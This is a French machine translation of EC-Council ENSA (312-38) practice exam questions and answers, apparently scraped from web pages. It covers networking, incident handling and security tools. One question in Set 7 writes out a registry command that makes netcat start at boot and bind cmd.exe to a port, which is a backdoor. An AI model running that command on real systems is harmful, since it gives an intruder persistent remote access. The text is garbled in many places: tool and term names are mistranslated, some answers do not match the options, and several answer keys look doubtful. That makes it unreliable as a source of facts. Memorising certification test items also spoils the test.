Réponse: Sniffe

Parmi les représentants suivants du processus de réponse aux incidents, lesquels sont inclus
dans l'équipe de réponse aux incidents? Chaque bonne réponse représente une solution
complète. Choisissez tout ce qui correspond.
Représentant en sécurité de l'information

Représentant légal

Représentant technique
Commercial

Enquêteur principal

Ressources humaines

Réponse: Représentant en sécurité de l'information Représentant légal Représentant technique


Chercheur principal Ressources humaines
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 28
/7
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3

Laquelle des attaques suivantes est une classe d'attaques par force brute qui dépend de la
probabilité plus élevée de collisions trouvées entre des tentatives d'attaque aléatoires et un
degré fixe de permutations?

Attaque par dictionnaire

Rejouer l'attaque

Une attaque par phishing

Attaque d'anniversaire

Réponse: attaque d'anniversaire


Parmi les éléments suivants, quels sont les problèmes de sécurité courants liés aux
communications et aux e-mails? Chaque bonne réponse représente une solution
complète. Choisissez tout ce qui correspond.

Écoute
Modification du message

Relecture du message

Usurpation d'identité

Répudiation des messages

Réponse: Écoute clandestine Modification du message Rejouer le message Faux message


Usurpation d'identité Répudiation du message

Lequel des éléments suivants est un protocole standard qui offre le plus haut niveau de
sécurité VPN?
L2TP

PPP

IPSec

IP

Réponse: IPSec

Lesquelles des affirmations suivantes sont vraies concernant la mémoire volatile? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.
Un périphérique de stockage volatile est plus rapide dans la lecture et l'écriture de données. La

mémoire morte (ROM) est un exemple de mémoire volatile.

Le contenu est stocké en permanence et même l'alimentation est coupée.

C'est la mémoire de l'ordinateur qui nécessite de l'énergie pour conserver les informations
stockées.

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 29
/7
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3
Réponse: Un périphérique de stockage volatile est plus rapide dans la lecture et l'écriture de
données. C'est la mémoire de l'ordinateur qui nécessite de l'énergie pour conserver les informations
stockées.

Lequel des éléments suivants est conçu pour détecter la présence indésirable d'incendie en
surveillant les changements environnementaux associés à la combustion?

Suppression des incendies gazeux

Arroseur d'incendie

Système d'alarme incendie Système

d'extinction d'incendie

Réponse: Système d'alarme incendie

Lequel des outils suivants est décrit ci-dessous? Il s'agit d'un ensemble d'outils utilisés pour
renifler les mots de passe, le courrier électronique et le trafic HTTP. Certains de ses outils
incluent arpredirect, macof, tcpkill, tcpnice, filesnarf et mailsnarf. Il est très efficace pour
flairer les réseaux commutés et partagés. Il utilise les outils arpredirect et macof pour
basculer entre les réseaux commutés. Il peut également être utilisé pour capturer des
informations d'authentification pour FTP, telnet, SMTP, HTTP, POP, NNTP, IMAP, etc.

COUVERCLES

Libnids

Dsniff

Caïn

Réponse: Dsniff

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 30
/7
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4

ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA)


Set d'examen 4
Lequel des modems suivants offre une communication sans fil sous l'eau?

Modem acoustique

Modem courte distance

Modem sans contrôleur

Modem optique

Réponse: Modem acoustique

Laquelle des étapes suivantes est requise dans une analyse inactive d'un port fermé? Chaque bonne réponse
représente une partie de la solution. Choisissez tout ce qui correspond

En réponse au SYN, la cible envoie un RST.

L'attaquant envoie un SYN / ACK au zombie.

Le zombie ignore la TVD non sollicitée et l'ID IP reste inchangé.

L'ID IP du zombie n'augmente que de 1.

Réponse: En réponse au SYN, la cible envoie un RST. L'attaquant envoie un SYN / ACK au zombie. Le zombie
ignore la TVD non sollicitée et l'ID IP reste inchangé. L'ID IP du zombie n'augmente que de 1.

Dans laquelle des attaques suivantes un attaquant a-t-il réussi à insérer un logiciel ou un programme
intermédiaire entre deux hôtes communicants?
Débordement de tampon

Homme au milieu

Déni de service

Détournement de session

Réponse: l' homme au milieu

Parmi les affirmations suivantes, lesquelles sont VRAIES concernant la zone démilitarisée (DMZ)? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.
Dans une configuration DMZ, la plupart des ordinateurs du LAN fonctionnent derrière un pare-feu connecté à un réseau
public comme Internet.

Les hôtes de la DMZ ont une connectivité complète avec des hôtes spécifiques du réseau interne.

La zone démilitarisée est un sous-réseau physique ou logique qui contient et expose les services externes d'une
organisation à un plus grand réseau non approuvé.

Le but d'une zone démilitarisée est d'ajouter une couche de sécurité supplémentaire au réseau local d'une
organisation.

Réponse: Dans une configuration DMZ, la plupart des ordinateurs du LAN fonctionnent derrière un pare-feu
connecté à un réseau public comme Internet. La zone démilitarisée est un sous-réseau physique ou logique qui contient
et expose les services externes d'une organisation à un plus grand réseau non approuvé. Le but d'une zone
démilitarisée est d'ajouter une couche de sécurité supplémentaire au réseau local d'une organisation.
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 31
/7
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4

Jason travaille en tant qu'administrateur système pour www.company.com Inc. La société possède un
réseau Windows. Sam, un employé de l'entreprise, modifie accidentellement certaines applications et
certains paramètres système. Il se plaint à Jason que son système ne fonctionne pas correctement. Pour
résoudre le problème, Jason diagnostique les composants internes de son ordinateur et observe que
certaines modifications ont été apportées au registre informatique de Sam. Pour corriger le problème, Jason
doit restaurer le registre. Lequel des utilitaires suivants Jason peut-il utiliser pour accomplir la
tâche? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Registraire resplendissant

Event

CombMT

Reg.exe Regedit.exe

Réponse: registraire resplendissant Reg.exe Regedit.exe

Lequel des éléments suivants est un dispositif d'interconnectivité réseau qui traduit différents protocoles de
communication et est utilisé pour connecter des technologies réseau différentes?
Passerelle

Routeur

Pont

Commutateur

Réponse: passerelle
Laquelle des étapes suivantes NE rend PAS un serveur tolérant aux pannes? Chaque bonne réponse
représente une solution complète. Choisissez deux.

Implémentation d'une installation de serveurs de cluster

Chiffrement des données confidentielles stockées sur le serveur Ajout

d'un disque de même taille en tant que miroir sur le serveur

Ajout d'un deuxième bloc d'alimentation

Effectuer une sauvegarde régulière du serveur

Réponse: Chiffrement des données confidentielles stockées sur le serveur Exécution d'une sauvegarde régulière
du serveur
Laquelle des politiques suivantes est utilisée pour ajouter des informations supplémentaires sur la sécurité
globale et sert à protéger les employés et les organisations contre l'inefficacité ou l'ambiguïté?
Politique d'utilisation

Politique de sécurité spécifique au problème

Stratégie de groupe

Politique informatique

Réponse: politique de sécurité spécifique au problème

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 32
/7
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4
Laquelle des six phases suivantes du processus de traitement des incidents? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

Récupération

Leçons apprises

Identification

Confinement

Préparation

Éradication

Réponse: Récupération Leçons apprises Identification Confinement Préparation Éradication


Lequel des éléments suivants est un protocole de mise en réseau informatique utilisé par les hôtes pour
récupérer les attributions d'adresses IP et d'autres informations de configuration?
ARP

DHCP

Telnet

SNMP

Réponse: DHCP

Lequel des éléments suivants est un processus de gestion qui fournit un cadre pour promouvoir une
récupération rapide et la capacité d'une réponse efficace pour protéger les intérêts de sa marque, de sa
réputation et de ses parties prenantes?
Traitement des incidents
Analyse du journal

Gestion des correctifs

Gestion de la continuité des activités (correcte)

Réponse: Gestion de la continuité des opérations

Lesquelles des adresses de classe IP suivantes ne sont pas attribuées aux hôtes? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

Classe E

Classe D

Classe A

Classe C

Classe B

Réponse: Classe D Classe E


Lequel des éléments suivants est un outil qui s'exécute sur le système d'exploitation Windows et analyse les
messages du journal iptables pour détecter les analyses de port et tout autre trafic suspect?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 33
/7
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4

Nmap

PSAD

Hping

NetRanger

Réponse: PSAD

John travaille en tant que gestionnaire d'incident pour TechWorld Inc. Sa tâche est de mettre en place un
réseau sans fil pour son organisation. Pour cela, il doit décider des appareils et des politiques appropriés
requis pour configurer le réseau. Laquelle des phases suivantes du processus de gestion des incidents
l'aidera à accomplir la tâche?

Préparation

Récupération

Éradication

Endiguement

Réponse: Préparation

Parmi les affirmations suivantes, lesquelles sont vraies concernant les risques de sécurité? Chaque bonne
réponse représente une solution complète. Choisissez trois.

Ils peuvent être atténués en examinant et en prenant des mesures responsables en fonction des risques
possibles.

Ils peuvent être analysés et mesurés par le processus d'analyse des risques

Ils sont considérés comme un indicateur des menaces couplées à la vulnérabilité. Ils

peuvent être supprimés complètement en prenant les mesures appropriées

Réponse: Ils peuvent être atténués en examinant et en prenant des mesures responsables en fonction des risques
possibles. Ils peuvent être analysés et mesurés par le processus d'analyse des risques. Ils sont considérés comme un
indicateur des menaces couplées à la vulnérabilité.

Laquelle des étapes suivantes du processus OPSEC examine chaque aspect de l'opération planifiée pour
identifier les indicateurs OPSEC qui pourraient révéler des informations critiques, puis comparer ces
indicateurs avec les capacités de collecte de renseignements de l'adversaire identifiées dans l'action
précédente?

Application des mesures OPSEC appropriées

Analyse des vulnérabilités Analyse

des menaces

Identification des informations critiques

Réponse: Analyse des vulnérabilités

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 34
/7
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4

Lesquelles des affirmations suivantes sont vraies à propos d'un réseau IPv6? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.
Il utilise des adresses 128 bits

Pour l'interopérabilité, les adresses IPv4 utilisent les 32 derniers bits des adresses IPv6. Il

augmente le nombre d'adresses IP disponibles

Il offre une authentification et une sécurité améliorées.

Il utilise des masques de sous-réseau plus longs que ceux utilisés dans IPv4.

Réponse: il utilise des adresses 128 bits Pour l'interopérabilité, les adresses IPv4 utilisent les 32 derniers bits des
adresses IPv6. Il augmente le nombre d'adresses IP disponibles. Il offre une authentification et une sécurité améliorées.
Lesquelles des affirmations suivantes sont vraies concernant un réseau sans fil? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

Les données peuvent être partagées facilement entre les appareils sans fil.

Il offre une mobilité aux utilisateurs pour accéder à un réseau.

Il est facile de se connecter.

Les données peuvent être transmises de différentes manières en utilisant les réseaux cellulaires, Mobitex, DataTAC, etc.

Réponse: Les données peuvent être partagées facilement entre les appareils sans fil.Il offre une mobilité aux
utilisateurs pour accéder à un réseau. Il est facile de se connecter.Les données peuvent être transmises de différentes
manières en utilisant les réseaux cellulaires, Mobitex, DataTAC, etc.

Dans laquelle des attaques suivantes les ordinateurs agissent-ils comme des zombies et travaillent ensemble
pour envoyer des messages faux, augmentant ainsi la quantité de trafic bidon?

Attaque par débordement de tampon

Attaque bonk

Attaque DDoS (correcte)


Attaque de Schtroumpf

Réponse: attaque DDoS

Lesquelles des méthodes suivantes un appareil peut-il utiliser pour consigner des informations sur un
routeur Cisco? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Journalisation SNMP

Journalisation des terminaux

Journalisation Syslog

Journalisation en mémoire tampon

Journalisation de la console

Journalisation NTP

Réponse: Journalisation SNMP Journalisation du terminal Journalisation Syslog Journalisation tamponnée


Journalisation de la console
https://cherc her.tech /hacking-certificalionei ccouncil-312-38-network-security-administrator-ensa-exam-test- set-4 9/9
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4
Lequel des câbles UTP suivants utilise quatre paires de câbles torsadés et fournit des vitesses de
transmission allant jusqu'à 16 Mbps?

Catégorie 3

Catégorie 6

Catégorie 5e

Catégorie 5

Réponse: Catégorie 3

Adam, un pirate malveillant, vient de réussir à voler un cookie sécurisé via une attaque XSS. Il est capable
de rejouer le cookie même lorsque la session est valide sur le serveur. Laquelle des raisons suivantes est la
raison la plus probable de cette cause?

Le chiffrement est effectué au niveau de la couche réseau (chiffrement de couche 1).

Aucun cryptage n'est appliqué.

Le chiffrement est effectué au niveau de la couche application (clé de chiffrement unique). Un

cryptage bidirectionnel est appliqué.

Réponse: Le chiffrement est effectué au niveau de la couche application (clé de chiffrement unique).

https://cherc her.tech /hacking-certificalionei ccouncil-312-38-network-security-administrator-ensa-exam-test- set-4 9/9


05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

ECCouncil 312-38 Ensemble d'examens de l'administrateur de la


sécurité du réseau (ENSA) 5
Lequel des câbles UTP suivants NE convient PAS à la transmission de données ou à l'utilisation de données
Ethernet?

Catégorie 1

Catégorie 4

Catégorie 6

Catégorie 5

Réponse: Catégorie 1

Lequel des énoncés suivants est un terme décrivant l'utilisation de gaz inertes et d'agents chimiques pour
éteindre un incendie?

Suppression des incendies gazeux

Système d'alarme anti-incendie

Arroseur d'incendie

Système d'extinction d'incendie

Réponse: suppression des incendies gazeux


Laquelle des commandes suivantes est utilisée pour l'analyse des ports?

nc -d

nc -z

nc -t

nc -v

Réponse: nc -z

Laquelle des techniques suivantes est également appelée cartographie des points d'accès?

Taraudage de fil
Vol de guerre

Conduite de guerre

Numérotation de guerre

Réponse: Conduite de guerre


Laquelle des normes suivantes définit Logical Link Control (LLC)?

802.2

802.4

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 5/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

802.3

802,5

Réponse: 802.2

Lequel des éléments suivants est un protocole d'authentification par mot de passe et d'échange de clés
obligatoire?

TYPE

VRRP

DH-CHAP

PPP

Réponse: DH-CHAP

Laquelle des classes d'adresses IP suivantes fournit un maximum de seulement 254 adresses d'hôte par ID
réseau?

Classe A

Classe D

Classe B

Classe C

Réponse: Classe C

Lequel des éléments suivants est le processus de gestion des incidents dans une entreprise?
Traitement des incidents

Analyse du journal

Réponse aux incidents

Gestion des correctifs

Réponse: gestion des incidents

Lequel des réseaux sans fil suivants fournit une connectivité sur une distance allant jusqu'à 20 pieds?

WWAN

WMAN

WPAN

WLAN

Réponse: WPAN
Lequel des éléments suivants est l'outil Windows le plus connu pour trouver des points d'accès sans fil
ouverts?
Dsniff

Renifler

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 5/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

Netstumbler

Netcat

Réponse: Netstumbler

Laquelle des organisations suivantes est la principale organisation internationale de normalisation pour le
World Wide Web?

WASC

ANSI

CCITT

W3C

Réponse: W3C

Lequel des éléments suivants est un chiffrement de bloc 64 bits symétrique qui peut prendre en charge des
longueurs de clé allant jusqu'à 448 bits?

XOR

BLOWFISH

HAVAL

IDÉE

Réponse: BLOWFISH
Lequel des réseaux suivants interconnecte des appareils centrés sur l'espace de travail d'une personne
individuelle?

WWAN

WMAN

WLAN

WPAN

Réponse: WPAN

Lequel des éléments suivants est le type de règle métier documentée pour protéger les informations et les
systèmes qui stockent et traitent les informations

Politique de stockage des informations

Politique de sécurité des informations

Politique de protection des informations

Document de protection des informations

Réponse: Politique de sécurité de l'information

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 5/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

Laquelle des couches suivantes du modèle OSI fournit les connexions de bout en bout et la fiabilité?
Couche physique
Couche Transport
Couche Session
Couche réseau

Réponse: couche de transport

Lequel des protocoles suivants est utilisé pour échanger des messages EDI cryptés par e-mail?

HTTP

MIME

HTTPS

S / MIME

Réponse: S / MIME

Laquelle des normes IEEE suivantes est également appelée Transition rapide de l'ensemble de services de
base?

802.11b

802.11a

802.11r

802.11e

Réponse: 802.11r

Laquelle des normes IEEE suivantes est un exemple de méthode d'accès DQDB?

802.3

802,5

802.4

802.6

Réponse: 802.6
Laquelle des couches suivantes fait référence aux protocoles de niveau supérieur utilisés par la plupart des
applications de communication réseau?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 5/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

Couche Internet

Couche d'application (correcte)

Réponse: couche d'application

Quelle est la taille en bits du champ En-tête suivant au format d'en-tête IPv6?
8 bits

20 bits

4 bits

2 bits

Réponse: 8 bits
Lequel des programmes suivants est un programme malveillant qui ressemble à un programme normal?

Ver de terre

Imitation

Cheval de Troie

Virus

Réponse: cheval de Troie

Lequel des éléments suivants est utilisé conjointement avec des détecteurs de fumée et des systèmes
d'alarme incendie pour améliorer et accroître la sécurité publique?

Suppression des incendies gazeux

Arroseur d'incendie

Système d'émission gazeuse

Système d'extinction d'incendie

Réponse: Système d'extinction d'incendie

Lequel des outils suivants est utilisé pour exécuter une commande ping sur une plage d'adresses IP donnée
et résoudre le nom d'hôte du système distant?

Netscan

Hping

SuperScan

Nmap

Réponse: SuperScan
Laquelle des couches suivantes du modèle OSI assure la communication interhôte?

Couche d'application

Couche de session

Couche réseau

Couche de transport

Réponse: couche de session

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 5/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5
Lequel des éléments suivants est susceptible d'une attaque d'anniversaire?

Signature numérique

Authentification

Autorisation

Intégrité

Réponse: signature numérique

Lequel des éléments suivants est une méthode d'authentification qui utilise des caractéristiques physiques?

COMSEC

Biométrie

Pot de miel

ACL

Réponse: biométrie

Lequel des éléments suivants est également appelé code de scories?

Ver de terre

IRC bot

Bombe logique

troyen

Réponse: bombe logique


Lequel des éléments suivants est une attaque passive?

L'accès non autorisé

Analyse du trafic

Détournement de session

Rejouer l'attaque

Réponse: Analyse du trafic


Lequel des éléments suivants est un protocole de couche session?

SLP

ICMP

RDP

RPC

Réponse: RPC
Lequel des éléments suivants est un protocole de couche de présentation?

TCP

RPC

BGP

LWAPP

Réponse: LWAPP
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 5/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

ECCouncil 312-38 Administrateur de la sécurité des réseaux


(ENSA), ensemble d'examens 6
Les adresses IP réservées à la multidiffusion appartiennent à laquelle des classes suivantes?

Classe C

Classe B

Classe D

Classe E

Réponse: Classe D
Laquelle des normes IEEE suivantes fonctionne sur une bande passante de 2,4 GHz et
transfère des données à un débit de 54 Mbps?

802.11n

802.11g

802.11r

802.11a

Réponse: 802.11g
Lequel des éléments suivants est un protocole IPSec qui peut être utilisé seul en combinaison
avec Authentication Header (AH)?
ESP

L2TP

PPTP

PPP

Réponse: ESP
Lequel des câbles UTP suivants prend en charge la transmission jusqu'à 20 MHz?

Catégorie 4

Catégorie 5e

Catégorie 1

Catégorie 2

Réponse: Catégorie 2

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 8/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5
Lequel des éléments suivants est un dispositif de sécurité physique conçu pour piéger une
personne exprès?

Mantrap

Vol de guerre

Craie de guerre

Piège

Réponse: Mantrap
Laquelle des adresses IP suivantes est l'adresse de bouclage dans IPv6?

0: 0: 0: 1: 1: 0: 0: 0

1: 0: 0: 0: 0: 0: 0: 0

0: 0: 0: 0: 0: 0: 0: 1

0: 0: 0: 0: 0: 0: 0: 0

Réponse: 0: 0: 0: 0: 0: 0: 0: 1

Laquelle des normes IEEE suivantes fournit des spécifications pour les systèmes ATM sans
fil?
802.3

802,5

802.1

802.11a

Réponse: 802.11a

Lequel des éléments suivants est un réseau informatique qui couvre une large zone?

POUVEZ

LA POÊLE

SAN

WAN

Réponse: WAN
Lesquels des éléments suivants sont fournis par des signatures numériques?
Intégrité et validation

Authentification et identification Sécurité

et intégrité

Identification et validation

Réponse: authentification et identification


https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 9/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

Laquelle des plages d'adresses suivantes peut être utilisée dans le premier octet d'une adresse
réseau de classe C?
192-223

128-191

0-127

224-255

Réponse: 192-223

Dans lequel des modes de transmission suivants la communication est-elle bidirectionnelle?

Mode simplex

Mode duplex intégral Mode

semi-duplex

Mode racine

Réponse: mode duplex intégral


Lequel des éléments suivants est un point de réseau qui sert d’entrée à un autre réseau?

Passerelle

Centre

Pont

Destinataire

Réponse: passerelle

Lequel des outils suivants est utilisé pour la détection des réseaux locaux sans fil?

fort Knox

NetStumbler

Airopeek

Renifleur

Réponse: NetStumbler

Laquelle des couches suivantes effectue le routage des datagrammes IP?


Couche de lien
Couche d'application
Couche Internet (correcte)
Couche de transport

Réponse: couche Internet

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 10/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5
Lequel des éléments suivants est un type d'escroquerie qui incite un utilisateur à divulguer des
informations personnelles?
Schtroumpf

Reniflement

Phishing

Spamming

Réponse: Phishing
Lesquels des pare-feu suivants sont utilisés pour suivre l'état des connexions actives et
déterminer les paquets réseau autorisés à entrer via le pare-feu? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

Passerelle au niveau du circuit

Avec état

Serveur proxy

Filtrage dynamique des paquets

Réponse: filtrage dynamique des paquets dynamique

Lequel des champs suivants de l'en-tête IPv6 est décrémenté de 1 pour chaque routeur qui
transfère le paquet?
En-tête suivant

Classe de trafic
Étiquette de flux

Limite de saut (correcte)

Réponse: limite de saut

Lequel des plans de récupération suivants comprend des stratégies et des actions spécifiques
pour faire face à des écarts spécifiques aux hypothèses entraînant un problème de sécurité,
une urgence ou une situation particulière?

Plan d'urgence

Plan de reprise après sinistre

Plan de continuité des opérations

Plan de continuité des activités

Réponse: Plan d'urgence

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 11/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5
Vous travaillez en tant qu'administrateur réseau pour uCertify Inc. La société a prévu
d'ajouter la prise en charge de l'adressage IPv6. Le déploiement de la phase initiale d'IPv6
nécessite la prise en charge de certains périphériques IPv6 uniquement. Ces appareils doivent
accéder à des serveurs qui prennent uniquement en charge IPv4. Lequel des outils suivants
conviendrait-il d'utiliser?
IPv6 natif

Tunnels point à point

Tunnels multipoints

NAT-PT

Réponse: NAT-PT

Lesquelles des responsabilités suivantes incombent à l'équipe de reprise après sinistre?


Chaque bonne réponse représente une solution complète. Choisissez tout ce qui correspond.
Pour surveiller l'exécution du plan de reprise après sinistre et évaluer les résultats
Pour modifier et mettre à jour le plan de reprise après sinistre en fonction des leçons tirées des efforts
de reprise après sinistre précédents

Pour informer la direction, le personnel concerné et les tiers de la catastrophe D.Initier l'exécution des
procédures de reprise après sinistre

Réponse: Pour surveiller l'exécution du plan de reprise après sinistre et évaluer les résultats
Pour modifier et mettre à jour le plan de reprise après sinistre en fonction des leçons tirées des efforts
antérieurs de reprise après sinistre Pour informer la direction, le personnel affecté et les tiers de la
catastrophe D.Initier l'exécution des procédures de reprise après sinistre

Lequel des systèmes suivants est formé par un groupe de pots de miel?

Honeyfarm

Pot de miel de recherche

Pot de miel de production

Honeynet

Réponse: Honeynet
Laquelle des mesures de routage suivantes fait référence à la durée nécessaire pour déplacer
un paquet de la source à la destination via l'interréseau?

Bande passante

Charge

Retard de routage

Longueur du trajet

Réponse: retard de routage


https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 12/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

Laquelle des options suivantes est l'une des implémentations de RAID les plus utilisées?

RAID 3

RAID 5

RAID 2

RAID 1

Réponse: RAID 5

Lequel des éléments suivants peut être effectué avec des périphériques logiciels ou matériels
afin d'enregistrer tout ce qu'une personne tape à l'aide de son clavier?

Numérotation de guerre

IRC bot

Enregistrement des frappes

Warchalking

Réponse: enregistrement des frappes


Lequel des éléments suivants est un processus de gestion qui fournit un cadre pour
promouvoir une récupération rapide et la capacité d'une réponse efficace pour protéger les
intérêts de sa marque, de sa réputation et de ses parties prenantes?

Gestion des correctifs

Gestion de la continuité des activités

Traitement des incidents

Analyse du journal

Réponse: Gestion de la continuité des opérations


Lequel des types de câbles coaxiaux suivants est utilisé pour la télévision par câble et les
modems câble?
RG-62

RG-8

RG-58

RG-59

Réponse: RG-59

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 13/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

Lequel des éléments suivants examine le trafic réseau pour identifier les menaces qui génèrent
des flux de trafic inhabituels, telles que les attaques par déni de service distribué (DDoS),
certaines formes de logiciels malveillants et les violations de stratégie?

Prévention d'intrusion basée sur le réseau

Analyse du comportement du réseau

Prévention des intrusions basée sur l'hôte

Système de prévention des intrusions sans fil

Réponse: Analyse du comportement du réseau

Lequel des processus suivants aide les unités opérationnelles à comprendre l'impact d'un
événement perturbateur?

Évaluation de l'impact sur les entreprises

Approbation et mise en œuvre du plan

Élaboration d'un plan de continuité des activités

Portée et lancement du plan

Réponse: évaluation de l'impact sur les entreprises


Lequel des outils suivants est un système open source de prévention et de détection des
intrusions sur le réseau qui fonctionne comme un renifleur de réseau et enregistre les activités
du réseau qui correspondent aux signatures prédéfinies?

Renifler

Dsniff

Kismet

KisMAC

Réponse: Snort

Dans laquelle des attaques suivantes un attaquant utilise-t-il un logiciel qui essaie un grand
nombre de combinaisons de touches afin d'obtenir un mot de passe?

Attaque de Schtroumpf

Débordement de tampon

Attaque par force brute Attaque

Zero Day

Réponse: Attaque par force brute

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 14/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7

ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité


de réseau (ENSA) 7
Vous exécutez la commande suivante sur l'ordinateur Windows Server 2003 distant: c: \ reg add HKLM \
Software \ Microsoft \ Windows \ CurrentVersion \ Run / v nc / t REG_SZ / d "c: \ windows \ nc.exe -d
192.168. 1.7 4444 -e cmd.exe "Quelle tâche souhaitez-vous exécuter en exécutant cette commande? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Vous souhaitez mettre Netcat en mode furtif.

Vous souhaitez effectuer une saisie de bannière.

Vous souhaitez ajouter la commande Netcat au registre Windows.

Vous souhaitez définir le Netcat pour exécuter la commande à tout moment.

Réponse: Vous souhaitez mettre Netcat en mode furtif. Vous souhaitez ajouter la commande Netcat au registre
Windows. Vous souhaitez définir le Netcat pour exécuter la commande à tout moment.

Lequel des éléments suivants est un appareil qui assure la communication locale entre l'enregistreur de
données et un ordinateur?

Modem optique

Modem acoustique

Modem courte distance Modem

sans contrôleur

Réponse: modem courte distance


Quelle est la position du pot de miel sur un réseau?

Honeyfarm

Centre

DMZ

Honeynet

Réponse: DMZ

Lesquels des éléments suivants sont utilisés comme technique d'estimation des coûts pendant la phase de
planification du projet? Chaque bonne réponse représente une solution complète. Choisissez trois.

Jugement d'expert

Technique d'examen des évaluations de programme (PERT)

Technique Delphi

Analyse des points de fonction

Réponse: Jugement expert Technique Delphi Analyse des points de fonction

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 15/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7
Parmi les affirmations suivantes, lesquelles ne sont PAS vraies concernant le système de fichiers FAT16?
Chaque réponse correcte représente une solution complète. Choisissez tout ce qui correspond.

Il ne prend pas en charge la sécurité au niveau des fichiers.

Il prend en charge le système d'exploitation Linux.

Il fonctionne bien avec les grands disques car la taille du cluster augmente à mesure que la taille de la partition de
disque augmente.

Il prend en charge la compression au niveau des fichiers.

Réponse: il ne prend pas en charge la sécurité au niveau des fichiers. Il prend en charge la compression au
niveau des fichiers.

Lequel des pots de miel suivants est une petite alarme antivol utile?

Honeyd

Honeynet

Compatible avec les backofficers

Spectre

Réponse: Backofficer friendly

Lequel des outils suivants est un outil gratuit de suivi des ordinateurs portables qui permet de suivre
l'ordinateur portable d'un utilisateur en cas de vol?

Renifler

Nessus

Adeona

SAINT

Réponse: Adeona

Lequel des éléments suivants est un outil d'audit de sécurité gratuit pour Linux?

HPing

SAINT

SATAN

Nessus

Réponse: Nessus
Lequel des éléments suivants est un protocole standard qui offre le plus haut niveau de sécurité VPN?

L2TP

PPP

IP

IPSec

Réponse: IPSec

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 16/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7
Lequel des outils suivants analyse les systèmes de réseau à la recherche de vulnérabilités connues et souvent
exploitées?
SATAN

Nessus

HPing

SAINT

Réponse: SATAN

Lequel des éléments suivants est un type de sécurité informatique qui traite de la protection contre les
